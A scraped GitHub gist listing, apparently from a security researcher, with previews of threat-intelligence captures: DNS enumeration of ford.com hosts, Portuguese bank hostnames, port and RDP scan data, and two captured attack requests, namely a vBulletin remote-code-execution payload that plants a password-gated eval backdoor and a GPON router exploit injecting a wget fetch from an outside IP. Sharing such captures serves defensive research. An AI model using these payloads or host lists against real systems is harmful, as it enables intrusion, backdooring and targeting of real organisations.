I hereby claim:
- I am balgan on github.
- I am balgan (https://keybase.io/balgan) on keybase.
- I have a public key whose fingerprint is BD0A 2C9A AAEF 8204 44D0 E119 00CD C6A5 B6B6 6C1D
To claim this, I am signing this object:
balgan
/ gist:8a8a00e5734fbbc0ed1658590453f504
Created
February 26, 2021 06:21
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| {"query": "ford.com", "total": 8371, "events": [{"fqdn": "pah482.ford.com", "records": [{"type": "A", "answers": [{"answer": "19.66.136.240"}]}]}, {"fqdn": "pah480.ford.com", "records": [{"type": "A", "answers": [{"answer": "19.82.167.161"}]}]}, {"fqdn": "fmms-vip-chicago_prod.chi.ford.com", "records": [{"type": "A", "answers": [{"answer": "136.2.48.44"}]}]}, {"fqdn": "dnschi1.ford.com", "records": [{"type": "A", "answers": [{"answer": "136.2.17.20"}]}]}, {"fqdn": "wwwqa.wslb2be.ford.com", "records": [{"type": "A", "answers": [{"answer": "136.1.58.62"}]}]}, {"fqdn": "wwwdevalt2.redfocb.ford.com", "records": [{"type": "A", "answers": [{"answer": "136.1.50.47"}]}]}, {"fqdn": "pah235.ford.com", "records": [{"type": "A", "answers": [{"answer": "19.171.18.23"}]}]}, {"fqdn": "wwwqamg16.frv.ford.com", "records": [{"type": "A", "answers": [{"answer": "136.1.81.51"}]}]}, {"fqdn": "web-competencycenter-vip-ashburn_prod.ash.ford.com", "records": [{"type": "A", "answers": [{"answer": "136.2.64.52"}]}]}, {"fqdn": "webedum |
balgan
/ gist:e6b5b4ef3ed932492ab9fc59e1905f17
Created
September 27, 2019 08:51
vbulletin botnet payload
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| POST/index.php?routestring=ajax/render/widget_phpHTTP/1.1\\r\\nHost:XX.XX.XX.XX\\r\\nUser-Agent:Mozilla/5.0(Linux;Android9;MHA-AL00Build/HUAWEIMHA-AL00;wv)AppleWebKit/537.36(KHTML,likeGecko)Version/4.0Chrome/71.0.3578.99MobileSafari/537.36MMWEBID/9772MicroMessenger/7.0.6.1460(0x27000634)Process/toolsNetType/WIFILanguage/zh_CN\\r\\nContent-Length:378\\r\\nContent-Type:application/x-www-form-urlencoded\\r\\nAccept-Encoding:gzip\\r\\n\\r\\nwidgetConfig[code]=echo+shell_exec('sed+-i+\'s/eval(\$code);/if+(isset(\$_REQUEST[\"epass\"])+\&\&+\$_REQUEST[\"epass\"]+==+\"2dmfrb28nu3c6s9j\")+{+eval(\$code);+}/g\'+includes/vb5/frontend/controller/bbcode.php+&&+echo+-n+exploited+|+md5sum');+exit;" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| "EUVNET.EUROVIDA.PT" | |
| "GYM2020.tranquilidade.pt" | |
| "acoreanaseguros.pt" | |
| "adcv.sibs.pt" | |
| "agentes.ptempresas.pt" | |
| "airw.bancobpi.pt" | |
| "ajuda.multicert.com" | |
| "alice.atlantico.eu" | |
| "analytics.sibs.pt" | |
| "aosaINTsvcs.jetblue.com" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| {"origin": {"country": "uk", "type": "port", "ts": 1540139424341}, "target": {"ip": "141.105.71.116", "port": 443, "protocol": "tcp"}, "result": null} | |
| {"origin": {"country": "uk", "type": "port", "ts": 1539868097719}, "target": {"ip": "141.105.71.116", "port": 443, "protocol": "tcp"}, "result": null} | |
| {"origin": {"country": "in", "type": "port", "ts": 1538559261431}, "target": {"ip": "141.105.71.116", "port": 443, "protocol": "tcp"}, "result": null} | |
| {"origin": {"country": "ca", "type": "port", "ts": 1538558926961}, "target": {"ip": "141.105.71.116", "port": 443, "protocol": "tcp"}, "result": null} | |
| {"origin": {"country": "nl", "type": "port", "ts": 1538076253390}, "target": {"ip": "141.105.71.116", "port": 443, "protocol": "tcp"}, "result": null} | |
| {"origin": {"country": "us", "type": "service-simple", "ts": 1540164006070}, "target": {"ip": "141.105.71.116", "port": 443, "protocol": "tcp"}, "result": {"data": {"service": {"version": "2.4.33", "product": "Apache httpd", "cpe": ["cpe:/a:apache:http_server:2.4.33", |
balgan
/ gist:305c5c0179988cec1a7a7c1664d0ea6b
Created
September 27, 2018 22:40
RDP scans port 3389 last 30 days
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # of unique ips scanning last 30 days | |
| 4201 | |
| # of connections | |
| @timestamp per day Count | |
| August 29th 2018, 00:00:00.000 17,837 | |
| August 30th 2018, 00:00:00.000 24,870 | |
| August 31st 2018, 00:00:00.000 16,542 | |
| September 1st 2018, 00:00:00.000 16,033 | |
| September 2nd 2018, 00:00:00.000 11,127 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| POST /GponForm/diag_Form?images/ HTTP/1.1\\r\\nCache-Control: no-cache\\r\\nConnection: keep-alive\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\r\\nHost: 178.62.43.33:80\\r\\nContent-Type: text/plain\\r\\nContent-length: 119\\r\\n\\r\\nXWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=wget;wget -qO - http://51.254.219.134/gpon.php?port=80&ipv=0 |
balgan
/ clam av worldwide scan results
Created
June 14, 2016 10:02
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 5642 | |
| 1 ClamAV 0.80/1168/Fri | |
| 2 ClamAV 0.80/5521/Wed | |
| 1 ClamAV 0.80rc3/510/Thu | |
| 2 ClamAV 0.83/8762/Mon | |
| 2 ClamAV 0.86.2/989/Sat | |
| 4 ClamAV 0.87/1082/Wed | |
| 2 ClamAV 0.88.2/1428/Thu | |
| 1 ClamAV 0.88.6/8082/Sun | |
| 1 ClamAV 0.88/1579/Sat |
balgan
/ keybase.md
Created
February 6, 2016 23:41
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| root@ubuntu:/home/balgan/sourceradar# ruby RuleSync.rb Ruby | |
| !!Loading rules for Ruby!! | |
| mail_to :encode => :javascript | |
| FileUtils.remove_entry_secure | |
| $SAFE | |
| limit | |
| BigDecimal | |
| strip_tag | |
| JSON.parse |